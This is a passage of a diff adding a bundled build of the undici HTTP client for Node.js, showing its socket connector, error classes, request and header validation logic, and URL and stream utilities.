Error('Invalid unparsed') + } + + const [key, ...value] = part.split('=') + + out.push(`${key.trim()}=${value.join('=')}`) + } + + return out.join('; ') +} + +let kHeadersListNode + +function getHeadersList (headers) { + if (headers[kHeadersList]) { + return headers[kHeadersList] + } + + if (!kHeadersListNode) { + kHeadersListNode = Object.getOwnPropertySymbols(headers).find( + (symbol) => symbol.description === 'headers list' + ) + + assert(kHeadersListNode, 'Headers cannot be parsed') + } + + const headersList = headers[kHeadersListNode] + assert(headersList) + + return headersList +} + +module.exports = { + isCTLExcludingHtab, + stringify, + getHeadersList +} + + +/***/ }), + +/***/ 2067: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const net = __nccwpck_require__(1808) +const assert = __nccwpck_require__(9491) +const util = __nccwpck_require__(3983) +const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) + +let tls // include tls conditionally since it is not always available + +// TODO: session re-use does not wait for the first +// connection to resolve the session and might therefore +// resolve the same servername multiple times even when +// re-use is enabled. 
+ +let SessionCache +// FIXME: remove workaround when the Node bug is fixed +// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 +if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { + SessionCache = class WeakSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + this._sessionRegistry = new global.FinalizationRegistry((key) => { + if (this._sessionCache.size < this._maxCachedSessions) { + return + } + + const ref = this._sessionCache.get(key) + if (ref !== undefined && ref.deref() === undefined) { + this._sessionCache.delete(key) + } + }) + } + + get (sessionKey) { + const ref = this._sessionCache.get(sessionKey) + return ref ? ref.deref() : null + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + this._sessionCache.set(sessionKey, new WeakRef(session)) + this._sessionRegistry.register(session, sessionKey) + } + } +} else { + SessionCache = class SimpleSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + } + + get (sessionKey) { + return this._sessionCache.get(sessionKey) + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + if (this._sessionCache.size >= this._maxCachedSessions) { + // remove the oldest session + const { value: oldestKey } = this._sessionCache.keys().next() + this._sessionCache.delete(oldestKey) + } + + this._sessionCache.set(sessionKey, session) + } + } +} + +function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { + if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { + throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') + } + + const options = { path: socketPath, ...opts } + const sessionCache = new SessionCache(maxCachedSessions == null ? 
100 : maxCachedSessions) + timeout = timeout == null ? 10e3 : timeout + allowH2 = allowH2 != null ? allowH2 : false + return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { + let socket + if (protocol === 'https:') { + if (!tls) { + tls = __nccwpck_require__(4404) + } + servername = servername || options.servername || util.getServerName(host) || null + + const sessionKey = servername || hostname + const session = sessionCache.get(sessionKey) || null + + assert(sessionKey) + + socket = tls.connect({ + highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... + ...options, + servername, + session, + localAddress, + // TODO(HTTP/2): Add support for h2c + ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], + socket: httpSocket, // upgrade socket connection + port: port || 443, + host: hostname + }) + + socket + .on('session', function (session) { + // TODO (fix): Can a session become invalid once established? Don't think so? + sessionCache.set(sessionKey, session) + }) + } else { + assert(!httpSocket, 'httpSocket can only be sent on TLS update') + socket = net.connect({ + highWaterMark: 64 * 1024, // Same as nodejs fs streams. + ...options, + localAddress, + port: port || 80, + host: hostname + }) + } + + // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket + if (options.keepAlive == null || options.keepAlive) { + const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay + socket.setKeepAlive(true, keepAliveInitialDelay) + } + + const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) + + socket + .setNoDelay(true) + .once(protocol === 'https:' ? 
'secureConnect' : 'connect', function () { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(null, this) + } + }) + .on('error', function (err) { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(err) + } + }) + + return socket + } +} + +function setupTimeout (onConnectTimeout, timeout) { + if (!timeout) { + return () => {} + } + + let s1 = null + let s2 = null + const timeoutId = setTimeout(() => { + // setImmediate is added to make sure that we priotorise socket error events over timeouts + s1 = setImmediate(() => { + if (process.platform === 'win32') { + // Windows needs an extra setImmediate probably due to implementation differences in the socket logic + s2 = setImmediate(() => onConnectTimeout()) + } else { + onConnectTimeout() + } + }) + }, timeout) + return () => { + clearTimeout(timeoutId) + clearImmediate(s1) + clearImmediate(s2) + } +} + +function onConnectTimeout (socket) { + util.destroy(socket, new ConnectTimeoutError()) +} + +module.exports = buildConnector + + +/***/ }), + +/***/ 8045: +/***/ ((module) => { + +"use strict"; + + +class UndiciError extends Error { + constructor (message) { + super(message) + this.name = 'UndiciError' + this.code = 'UND_ERR' + } +} + +class ConnectTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ConnectTimeoutError) + this.name = 'ConnectTimeoutError' + this.message = message || 'Connect Timeout Error' + this.code = 'UND_ERR_CONNECT_TIMEOUT' + } +} + +class HeadersTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersTimeoutError) + this.name = 'HeadersTimeoutError' + this.message = message || 'Headers Timeout Error' + this.code = 'UND_ERR_HEADERS_TIMEOUT' + } +} + +class HeadersOverflowError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersOverflowError) + this.name = 
'HeadersOverflowError' + this.message = message || 'Headers Overflow Error' + this.code = 'UND_ERR_HEADERS_OVERFLOW' + } +} + +class BodyTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, BodyTimeoutError) + this.name = 'BodyTimeoutError' + this.message = message || 'Body Timeout Error' + this.code = 'UND_ERR_BODY_TIMEOUT' + } +} + +class ResponseStatusCodeError extends UndiciError { + constructor (message, statusCode, headers, body) { + super(message) + Error.captureStackTrace(this, ResponseStatusCodeError) + this.name = 'ResponseStatusCodeError' + this.message = message || 'Response Status Code Error' + this.code = 'UND_ERR_RESPONSE_STATUS_CODE' + this.body = body + this.status = statusCode + this.statusCode = statusCode + this.headers = headers + } +} + +class InvalidArgumentError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidArgumentError) + this.name = 'InvalidArgumentError' + this.message = message || 'Invalid Argument Error' + this.code = 'UND_ERR_INVALID_ARG' + } +} + +class InvalidReturnValueError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidReturnValueError) + this.name = 'InvalidReturnValueError' + this.message = message || 'Invalid Return Value Error' + this.code = 'UND_ERR_INVALID_RETURN_VALUE' + } +} + +class RequestAbortedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, RequestAbortedError) + this.name = 'AbortError' + this.message = message || 'Request aborted' + this.code = 'UND_ERR_ABORTED' + } +} + +class InformationalError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InformationalError) + this.name = 'InformationalError' + this.message = message || 'Request information' + this.code = 'UND_ERR_INFO' + } +} + +class RequestContentLengthMismatchError extends UndiciError { 
+ constructor (message) { + super(message) + Error.captureStackTrace(this, RequestContentLengthMismatchError) + this.name = 'RequestContentLengthMismatchError' + this.message = message || 'Request body length does not match content-length header' + this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' + } +} + +class ResponseContentLengthMismatchError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseContentLengthMismatchError) + this.name = 'ResponseContentLengthMismatchError' + this.message = message || 'Response body length does not match content-length header' + this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' + } +} + +class ClientDestroyedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientDestroyedError) + this.name = 'ClientDestroyedError' + this.message = message || 'The client is destroyed' + this.code = 'UND_ERR_DESTROYED' + } +} + +class ClientClosedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientClosedError) + this.name = 'ClientClosedError' + this.message = message || 'The client is closed' + this.code = 'UND_ERR_CLOSED' + } +} + +class SocketError extends UndiciError { + constructor (message, socket) { + super(message) + Error.captureStackTrace(this, SocketError) + this.name = 'SocketError' + this.message = message || 'Socket error' + this.code = 'UND_ERR_SOCKET' + this.socket = socket + } +} + +class NotSupportedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'NotSupportedError' + this.message = message || 'Not supported error' + this.code = 'UND_ERR_NOT_SUPPORTED' + } +} + +class BalancedPoolMissingUpstreamError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'MissingUpstreamError' + this.message = message || 'No 
upstream has been added to the BalancedPool' + this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' + } +} + +class HTTPParserError extends Error { + constructor (message, code, data) { + super(message) + Error.captureStackTrace(this, HTTPParserError) + this.name = 'HTTPParserError' + this.code = code ? `HPE_${code}` : undefined + this.data = data ? data.toString() : undefined + } +} + +class ResponseExceededMaxSizeError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseExceededMaxSizeError) + this.name = 'ResponseExceededMaxSizeError' + this.message = message || 'Response content exceeded max size' + this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' + } +} + +class RequestRetryError extends UndiciError { + constructor (message, code, { headers, data }) { + super(message) + Error.captureStackTrace(this, RequestRetryError) + this.name = 'RequestRetryError' + this.message = message || 'Request retry error' + this.code = 'UND_ERR_REQ_RETRY' + this.statusCode = code + this.data = data + this.headers = headers + } +} + +module.exports = { + HTTPParserError, + UndiciError, + HeadersTimeoutError, + HeadersOverflowError, + BodyTimeoutError, + RequestContentLengthMismatchError, + ConnectTimeoutError, + ResponseStatusCodeError, + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError, + ClientDestroyedError, + ClientClosedError, + InformationalError, + SocketError, + NotSupportedError, + ResponseContentLengthMismatchError, + BalancedPoolMissingUpstreamError, + ResponseExceededMaxSizeError, + RequestRetryError +} + + +/***/ }), + +/***/ 2905: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + InvalidArgumentError, + NotSupportedError +} = __nccwpck_require__(8045) +const assert = __nccwpck_require__(9491) +const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) +const util = __nccwpck_require__(3983) + +// tokenRegExp and 
headerCharRegex have been lifted from +// https://github.com/nodejs/node/blob/main/lib/_http_common.js + +/** + * Verifies that the given val is a valid HTTP token + * per the rules defined in RFC 7230 + * See https://tools.ietf.org/html/rfc7230#section-3.2.6 + */ +const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ + +/** + * Matches if val contains an invalid field-vchar + * field-value = *( field-content / obs-fold ) + * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] + * field-vchar = VCHAR / obs-text + */ +const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ + +// Verifies that a given path is valid does not contain control chars \x00 to \x20 +const invalidPathRegex = /[^\u0021-\u00ff]/ + +const kHandler = Symbol('handler') + +const channels = {} + +let extractBody + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.create = diagnosticsChannel.channel('undici:request:create') + channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') + channels.headers = diagnosticsChannel.channel('undici:request:headers') + channels.trailers = diagnosticsChannel.channel('undici:request:trailers') + channels.error = diagnosticsChannel.channel('undici:request:error') +} catch { + channels.create = { hasSubscribers: false } + channels.bodySent = { hasSubscribers: false } + channels.headers = { hasSubscribers: false } + channels.trailers = { hasSubscribers: false } + channels.error = { hasSubscribers: false } +} + +class Request { + constructor (origin, { + path, + method, + body, + headers, + query, + idempotent, + blocking, + upgrade, + headersTimeout, + bodyTimeout, + reset, + throwOnError, + expectContinue + }, handler) { + if (typeof path !== 'string') { + throw new InvalidArgumentError('path must be a string') + } else if ( + path[0] !== '/' && + !(path.startsWith('http://') || path.startsWith('https://')) && + method !== 'CONNECT' + ) { + throw new InvalidArgumentError('path must be an absolute URL or start with a slash') 
+ } else if (invalidPathRegex.exec(path) !== null) { + throw new InvalidArgumentError('invalid request path') + } + + if (typeof method !== 'string') { + throw new InvalidArgumentError('method must be a string') + } else if (tokenRegExp.exec(method) === null) { + throw new InvalidArgumentError('invalid request method') + } + + if (upgrade && typeof upgrade !== 'string') { + throw new InvalidArgumentError('upgrade must be a string') + } + + if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('invalid headersTimeout') + } + + if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { + throw new InvalidArgumentError('invalid bodyTimeout') + } + + if (reset != null && typeof reset !== 'boolean') { + throw new InvalidArgumentError('invalid reset') + } + + if (expectContinue != null && typeof expectContinue !== 'boolean') { + throw new InvalidArgumentError('invalid expectContinue') + } + + this.headersTimeout = headersTimeout + + this.bodyTimeout = bodyTimeout + + this.throwOnError = throwOnError === true + + this.method = method + + this.abort = null + + if (body == null) { + this.body = null + } else if (util.isStream(body)) { + this.body = body + + const rState = this.body._readableState + if (!rState || !rState.autoDestroy) { + this.endHandler = function autoDestroy () { + util.destroy(this) + } + this.body.on('end', this.endHandler) + } + + this.errorHandler = err => { + if (this.abort) { + this.abort(err) + } else { + this.error = err + } + } + this.body.on('error', this.errorHandler) + } else if (util.isBuffer(body)) { + this.body = body.byteLength ? body : null + } else if (ArrayBuffer.isView(body)) { + this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null + } else if (body instanceof ArrayBuffer) { + this.body = body.byteLength ? Buffer.from(body) : null + } else if (typeof body === 'string') { + this.body = body.length ? 
Buffer.from(body) : null + } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { + this.body = body + } else { + throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') + } + + this.completed = false + + this.aborted = false + + this.upgrade = upgrade || null + + this.path = query ? util.buildURL(path, query) : path + + this.origin = origin + + this.idempotent = idempotent == null + ? method === 'HEAD' || method === 'GET' + : idempotent + + this.blocking = blocking == null ? false : blocking + + this.reset = reset == null ? null : reset + + this.host = null + + this.contentLength = null + + this.contentType = null + + this.headers = '' + + // Only for H2 + this.expectContinue = expectContinue != null ? expectContinue : false + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(this, headers[i], headers[i + 1]) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(this, key, headers[key]) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + if (util.isFormDataLike(this.body)) { + if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { + throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') + } + + if (!extractBody) { + extractBody = (__nccwpck_require__(1472).extractBody) + } + + const [bodyStream, contentType] = extractBody(body) + if (this.contentType == null) { + this.contentType = contentType + this.headers += `content-type: ${contentType}\r\n` + } + this.body = bodyStream.stream + this.contentLength = bodyStream.length + } else if (util.isBlobLike(body) && this.contentType == 
null && body.type) { + this.contentType = body.type + this.headers += `content-type: ${body.type}\r\n` + } + + util.validateHandler(handler, method, upgrade) + + this.servername = util.getServerName(this.host) + + this[kHandler] = handler + + if (channels.create.hasSubscribers) { + channels.create.publish({ request: this }) + } + } + + onBodySent (chunk) { + if (this[kHandler].onBodySent) { + try { + return this[kHandler].onBodySent(chunk) + } catch (err) { + this.abort(err) + } + } + } + + onRequestSent () { + if (channels.bodySent.hasSubscribers) { + channels.bodySent.publish({ request: this }) + } + + if (this[kHandler].onRequestSent) { + try { + return this[kHandler].onRequestSent() + } catch (err) { + this.abort(err) + } + } + } + + onConnect (abort) { + assert(!this.aborted) + assert(!this.completed) + + if (this.error) { + abort(this.error) + } else { + this.abort = abort + return this[kHandler].onConnect(abort) + } + } + + onHeaders (statusCode, headers, resume, statusText) { + assert(!this.aborted) + assert(!this.completed) + + if (channels.headers.hasSubscribers) { + channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) + } + + try { + return this[kHandler].onHeaders(statusCode, headers, resume, statusText) + } catch (err) { + this.abort(err) + } + } + + onData (chunk) { + assert(!this.aborted) + assert(!this.completed) + + try { + return this[kHandler].onData(chunk) + } catch (err) { + this.abort(err) + return false + } + } + + onUpgrade (statusCode, headers, socket) { + assert(!this.aborted) + assert(!this.completed) + + return this[kHandler].onUpgrade(statusCode, headers, socket) + } + + onComplete (trailers) { + this.onFinally() + + assert(!this.aborted) + + this.completed = true + if (channels.trailers.hasSubscribers) { + channels.trailers.publish({ request: this, trailers }) + } + + try { + return this[kHandler].onComplete(trailers) + } catch (err) { + // TODO (fix): This might be a bad idea? 
+ this.onError(err) + } + } + + onError (error) { + this.onFinally() + + if (channels.error.hasSubscribers) { + channels.error.publish({ request: this, error }) + } + + if (this.aborted) { + return + } + this.aborted = true + + return this[kHandler].onError(error) + } + + onFinally () { + if (this.errorHandler) { + this.body.off('error', this.errorHandler) + this.errorHandler = null + } + + if (this.endHandler) { + this.body.off('end', this.endHandler) + this.endHandler = null + } + } + + // TODO: adjust to support H2 + addHeader (key, value) { + processHeader(this, key, value) + return this + } + + static [kHTTP1BuildRequest] (origin, opts, handler) { + // TODO: Migrate header parsing here, to make Requests + // HTTP agnostic + return new Request(origin, opts, handler) + } + + static [kHTTP2BuildRequest] (origin, opts, handler) { + const headers = opts.headers + opts = { ...opts, headers: null } + + const request = new Request(origin, opts, handler) + + request.headers = {} + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(request, headers[i], headers[i + 1], true) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(request, key, headers[key], true) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + return request + } + + static [kHTTP2CopyHeaders] (raw) { + const rawHeaders = raw.split('\r\n') + const headers = {} + + for (const header of rawHeaders) { + const [key, value] = header.split(': ') + + if (value == null || value.length === 0) continue + + if (headers[key]) headers[key] += `,${value}` + else headers[key] = value + } + + return headers + } +} + +function processHeaderValue (key, val, skipAppend) { + if (val && typeof val 
=== 'object') { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + val = val != null ? `${val}` : '' + + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + return skipAppend ? val : `${key}: ${val}\r\n` +} + +function processHeader (request, key, val, skipAppend = false) { + if (val && (typeof val === 'object' && !Array.isArray(val))) { + throw new InvalidArgumentError(`invalid ${key} header`) + } else if (val === undefined) { + return + } + + if ( + request.host === null && + key.length === 4 && + key.toLowerCase() === 'host' + ) { + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + // Consumed by Client + request.host = val + } else if ( + request.contentLength === null && + key.length === 14 && + key.toLowerCase() === 'content-length' + ) { + request.contentLength = parseInt(val, 10) + if (!Number.isFinite(request.contentLength)) { + throw new InvalidArgumentError('invalid content-length header') + } + } else if ( + request.contentType === null && + key.length === 12 && + key.toLowerCase() === 'content-type' + ) { + request.contentType = val + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } else if ( + key.length === 17 && + key.toLowerCase() === 'transfer-encoding' + ) { + throw new InvalidArgumentError('invalid transfer-encoding header') + } else if ( + key.length === 10 && + key.toLowerCase() === 'connection' + ) { + const value = typeof val === 'string' ? 
val.toLowerCase() : null + if (value !== 'close' && value !== 'keep-alive') { + throw new InvalidArgumentError('invalid connection header') + } else if (value === 'close') { + request.reset = true + } + } else if ( + key.length === 10 && + key.toLowerCase() === 'keep-alive' + ) { + throw new InvalidArgumentError('invalid keep-alive header') + } else if ( + key.length === 7 && + key.toLowerCase() === 'upgrade' + ) { + throw new InvalidArgumentError('invalid upgrade header') + } else if ( + key.length === 6 && + key.toLowerCase() === 'expect' + ) { + throw new NotSupportedError('expect header not supported') + } else if (tokenRegExp.exec(key) === null) { + throw new InvalidArgumentError('invalid header key') + } else { + if (Array.isArray(val)) { + for (let i = 0; i < val.length; i++) { + if (skipAppend) { + if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` + else request.headers[key] = processHeaderValue(key, val[i], skipAppend) + } else { + request.headers += processHeaderValue(key, val[i]) + } + } + } else { + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } + } +} + +module.exports = Request + + +/***/ }), + +/***/ 2785: +/***/ ((module) => { + +module.exports = { + kClose: Symbol('close'), + kDestroy: Symbol('destroy'), + kDispatch: Symbol('dispatch'), + kUrl: Symbol('url'), + kWriting: Symbol('writing'), + kResuming: Symbol('resuming'), + kQueue: Symbol('queue'), + kConnect: Symbol('connect'), + kConnecting: Symbol('connecting'), + kHeadersList: Symbol('headers list'), + kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), + kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), + kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), + kKeepAliveTimeoutValue: Symbol('keep alive timeout'), + kKeepAlive: Symbol('keep alive'), + kHeadersTimeout: Symbol('headers timeout'), + kBodyTimeout: Symbol('body 
timeout'), + kServerName: Symbol('server name'), + kLocalAddress: Symbol('local address'), + kHost: Symbol('host'), + kNoRef: Symbol('no ref'), + kBodyUsed: Symbol('used'), + kRunning: Symbol('running'), + kBlocking: Symbol('blocking'), + kPending: Symbol('pending'), + kSize: Symbol('size'), + kBusy: Symbol('busy'), + kQueued: Symbol('queued'), + kFree: Symbol('free'), + kConnected: Symbol('connected'), + kClosed: Symbol('closed'), + kNeedDrain: Symbol('need drain'), + kReset: Symbol('reset'), + kDestroyed: Symbol.for('nodejs.stream.destroyed'), + kMaxHeadersSize: Symbol('max headers size'), + kRunningIdx: Symbol('running index'), + kPendingIdx: Symbol('pending index'), + kError: Symbol('error'), + kClients: Symbol('clients'), + kClient: Symbol('client'), + kParser: Symbol('parser'), + kOnDestroyed: Symbol('destroy callbacks'), + kPipelining: Symbol('pipelining'), + kSocket: Symbol('socket'), + kHostHeader: Symbol('host header'), + kConnector: Symbol('connector'), + kStrictContentLength: Symbol('strict content length'), + kMaxRedirections: Symbol('maxRedirections'), + kMaxRequests: Symbol('maxRequestsPerClient'), + kProxy: Symbol('proxy agent options'), + kCounter: Symbol('socket request counter'), + kInterceptors: Symbol('dispatch interceptors'), + kMaxResponseSize: Symbol('max response size'), + kHTTP2Session: Symbol('http2Session'), + kHTTP2SessionState: Symbol('http2Session state'), + kHTTP2BuildRequest: Symbol('http2 build request'), + kHTTP1BuildRequest: Symbol('http1 build request'), + kHTTP2CopyHeaders: Symbol('http2 copy headers'), + kHTTPConnVersion: Symbol('http connection version'), + kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), + kConstruct: Symbol('constructable') +} + + +/***/ }), + +/***/ 3983: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) +const { IncomingMessage } = 
__nccwpck_require__(3685) +const stream = __nccwpck_require__(2781) +const net = __nccwpck_require__(1808) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { Blob } = __nccwpck_require__(4300) +const nodeUtil = __nccwpck_require__(3837) +const { stringify } = __nccwpck_require__(3477) + +const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) + +function nop () {} + +function isStream (obj) { + return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' +} + +// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) +function isBlobLike (object) { + return (Blob && object instanceof Blob) || ( + object && + typeof object === 'object' && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + /^(Blob|File)$/.test(object[Symbol.toStringTag]) + ) +} + +function buildURL (url, queryParams) { + if (url.includes('?') || url.includes('#')) { + throw new Error('Query params cannot be passed when url already contains "?" or "#".') + } + + const stringified = stringify(queryParams) + + if (stringified) { + url += '?' 
+ stringified + } + + return url +} + +function parseURL (url) { + if (typeof url === 'string') { + url = new URL(url) + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + return url + } + + if (!url || typeof url !== 'object') { + throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') + } + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + if (!(url instanceof URL)) { + if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { + throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') + } + + if (url.path != null && typeof url.path !== 'string') { + throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') + } + + if (url.pathname != null && typeof url.pathname !== 'string') { + throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') + } + + if (url.hostname != null && typeof url.hostname !== 'string') { + throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') + } + + if (url.origin != null && typeof url.origin !== 'string') { + throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') + } + + const port = url.port != null + ? url.port + : (url.protocol === 'https:' ? 443 : 80) + let origin = url.origin != null + ? url.origin + : `${url.protocol}//${url.hostname}:${port}` + let path = url.path != null + ? 
url.path + : `${url.pathname || ''}${url.search || ''}` + + if (origin.endsWith('/')) { + origin = origin.substring(0, origin.length - 1) + } + + if (path && !path.startsWith('/')) { + path = `/${path}` + } + // new URL(path, origin) is unsafe when `path` contains an absolute URL + // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: + // If first parameter is a relative URL, second param is required, and will be used as the base URL. + // If first parameter is an absolute URL, a given second param will be ignored. + url = new URL(origin + path) + } + + return url +} + +function parseOrigin (url) { + url = parseURL(url) + + if (url.pathname !== '/' || url.search || url.hash) { + throw new InvalidArgumentError('invalid url') + } + + return url +} + +function getHostname (host) { + if (host[0] === '[') { + const idx = host.indexOf(']') + + assert(idx !== -1) + return host.substring(1, idx) + } + + const idx = host.indexOf(':') + if (idx === -1) return host + + return host.substring(0, idx) +} + +// IP addresses are not valid server names per RFC6066 +// > Currently, the only server names supported are DNS hostnames +function getServerName (host) { + if (!host) { + return null + } + + assert.strictEqual(typeof host, 'string') + + const servername = getHostname(host) + if (net.isIP(servername)) { + return '' + } + + return servername +} + +function deepClone (obj) { + return JSON.parse(JSON.stringify(obj)) +} + +function isAsyncIterable (obj) { + return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') +} + +function isIterable (obj) { + return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) +} + +function bodyLength (body) { + if (body == null) { + return 0 + } else if (isStream(body)) { + const state = body._readableState + return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) + ? 
state.length + : null + } else if (isBlobLike(body)) { + return body.size != null ? body.size : null + } else if (isBuffer(body)) { + return body.byteLength + } + + return null +} + +function isDestroyed (stream) { + return !stream || !!(stream.destroyed || stream[kDestroyed]) +} + +function isReadableAborted (stream) { + const state = stream && stream._readableState + return isDestroyed(stream) && state && !state.endEmitted +} + +function destroy (stream, err) { + if (stream == null || !isStream(stream) || isDestroyed(stream)) { + return + } + + if (typeof stream.destroy === 'function') { + if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { + // See: https://github.com/nodejs/node/pull/38505/files + stream.socket = null + } + + stream.destroy(err) + } else if (err) { + process.nextTick((stream, err) => { + stream.emit('error', err) + }, stream, err) + } + + if (stream.destroyed !== true) { + stream[kDestroyed] = true + } +} + +const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ +function parseKeepAliveTimeout (val) { + const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) + return m ? 
